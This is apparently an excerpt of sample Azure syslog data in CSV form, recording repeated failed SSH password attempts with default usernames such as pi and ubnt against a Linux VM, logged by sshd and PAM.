+12426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:52,UbuntuDevEnv,2019-06-26 03:40:52,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:52,UbuntuDevEnv,2019-06-26 03:40:52,auth,UbuntuDevEnv,info,Disconnecting invalid user ubnt 45.122.222.193 port 55595: Too many authentication failures [preauth],116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:52,UbuntuDevEnv,2019-06-26 03:40:52,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 55595 ssh2,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:52,UbuntuDevEnv,2019-06-26 03:40:52,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:02,UbuntuDevEnv,2019-06-26 03:41:02,auth,UbuntuDevEnv,info,Invalid user ubnt from 45.122.222.193 port 57109,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,57109,,
+12431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:03,UbuntuDevEnv,2019-06-26 03:41:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:03,UbuntuDevEnv,2019-06-26 03:41:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:05,UbuntuDevEnv,2019-06-26 03:41:04,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 57109 ssh2,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,57109,,
+12434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:05,UbuntuDevEnv,2019-06-26 03:41:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:06,UbuntuDevEnv,2019-06-26 03:41:06,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 57109 ssh2,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,57109,,
+12436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:06,UbuntuDevEnv,2019-06-26 03:41:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:09,UbuntuDevEnv,2019-06-26 03:41:08,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 57109 ssh2,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,57109,,
+12438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:09,UbuntuDevEnv,2019-06-26 03:41:09,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:09,UbuntuDevEnv,2019-06-26 03:41:09,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 57109:11: Bye Bye [preauth],116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,57109,,
+12440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:09,UbuntuDevEnv,2019-06-26 03:41:09,auth,UbuntuDevEnv,info,Disconnected from invalid user ubnt 45.122.222.193 port 57109 [preauth],116449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,57109,,
+12441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:10,UbuntuDevEnv,2019-06-26 03:41:10,auth,UbuntuDevEnv,info,Invalid user pi from 45.122.222.193 port 57691,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:11,UbuntuDevEnv,2019-06-26 03:41:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:11,UbuntuDevEnv,2019-06-26 03:41:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:12,UbuntuDevEnv,2019-06-26 03:41:11,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 57691 ssh2,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:12,UbuntuDevEnv,2019-06-26 03:41:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:14,UbuntuDevEnv,2019-06-26 03:41:14,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 57691 ssh2,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:14,UbuntuDevEnv,2019-06-26 03:41:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:16,UbuntuDevEnv,2019-06-26 03:41:16,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 57691 ssh2,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:17,UbuntuDevEnv,2019-06-26 03:41:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:19,UbuntuDevEnv,2019-06-26 03:41:18,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 57691 ssh2,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:19,UbuntuDevEnv,2019-06-26 03:41:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:20,UbuntuDevEnv,2019-06-26 03:41:19,auth,UbuntuDevEnv,info,Invalid user nei from 43.242.215.70 port 56770,116515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nei,43.242.215.7,56770,,
+12453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:20,UbuntuDevEnv,2019-06-26 03:41:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,116515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:20,UbuntuDevEnv,2019-06-26 03:41:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:21,UbuntuDevEnv,2019-06-26 03:41:20,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 57691 ssh2,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:21,UbuntuDevEnv,2019-06-26 03:41:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:22,UbuntuDevEnv,2019-06-26 03:41:21,auth,UbuntuDevEnv,info,Failed password for invalid user nei from 43.242.215.70 port 56770 ssh2,116515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nei,43.242.215.7,56770,,
+12458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:22,UbuntuDevEnv,2019-06-26 03:41:22,auth,UbuntuDevEnv,info,Disconnected from invalid user nei 43.242.215.70 port 56770 [preauth],116515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nei,43.242.215.7,56770,,
+12459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:22,UbuntuDevEnv,2019-06-26 03:41:22,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 56770:11: Bye Bye [preauth],116515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,56770,,
+12460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:23,UbuntuDevEnv,2019-06-26 03:41:22,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 57691 ssh2,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:23,UbuntuDevEnv,2019-06-26 03:41:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user pi from 45.122.222.193 port 57691 ssh2 [preauth],116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:23,UbuntuDevEnv,2019-06-26 03:41:22,auth,UbuntuDevEnv,info,Disconnecting invalid user pi 45.122.222.193 port 57691: Too many authentication failures [preauth],116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,57691,,
+12463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:23,UbuntuDevEnv,2019-06-26 03:41:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:23,UbuntuDevEnv,2019-06-26 03:41:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:27,UbuntuDevEnv,2019-06-26 03:41:26,auth,UbuntuDevEnv,info,Invalid user shuai from 118.24.131.236 port 50686,116541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuai,118.24.131.2,50686,,
+12466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:27,UbuntuDevEnv,2019-06-26 03:41:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:27,UbuntuDevEnv,2019-06-26 03:41:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,116541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:28,UbuntuDevEnv,2019-06-26 03:41:28,auth,UbuntuDevEnv,info,Failed password for invalid user shuai from 118.24.131.236 port 50686 ssh2,116541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuai,118.24.131.2,50686,,
+12469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:29,UbuntuDevEnv,2019-06-26 03:41:28,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 50686:11: Bye Bye [preauth],116541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,50686,,
+12470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:29,UbuntuDevEnv,2019-06-26 03:41:28,auth,UbuntuDevEnv,info,Disconnected from invalid user shuai 118.24.131.236 port 50686 [preauth],116541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuai,118.24.131.2,50686,,
+12471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:35,UbuntuDevEnv,2019-06-26 03:41:34,auth,UbuntuDevEnv,info,Invalid user pi from 45.122.222.193 port 59176,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,59176,,
+12472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:35,UbuntuDevEnv,2019-06-26 03:41:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:35,UbuntuDevEnv,2019-06-26 03:41:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:37,UbuntuDevEnv,2019-06-26 03:41:36,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 59176 ssh2,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,59176,,
+12475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:37,UbuntuDevEnv,2019-06-26 03:41:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:39,UbuntuDevEnv,2019-06-26 03:41:38,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 59176 ssh2,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,59176,,
+12477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:39,UbuntuDevEnv,2019-06-26 03:41:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:41,UbuntuDevEnv,2019-06-26 03:41:40,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 45.122.222.193 port 59176 ssh2,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,59176,,
+12479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:41,UbuntuDevEnv,2019-06-26 03:41:40,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 59176:11: Bye Bye [preauth],116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,59176,,
+12480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:41,UbuntuDevEnv,2019-06-26 03:41:40,auth,UbuntuDevEnv,info,Disconnected from invalid user pi 45.122.222.193 port 59176 [preauth],116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,45.122.222.1,59176,,
+12481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:41,UbuntuDevEnv,2019-06-26 03:41:40,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:43,UbuntuDevEnv,2019-06-26 03:41:42,auth,UbuntuDevEnv,info,Invalid user xbian from 45.122.222.193 port 59931,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:43,UbuntuDevEnv,2019-06-26 03:41:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:43,UbuntuDevEnv,2019-06-26 03:41:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:45,UbuntuDevEnv,2019-06-26 03:41:44,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 59931 ssh2,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
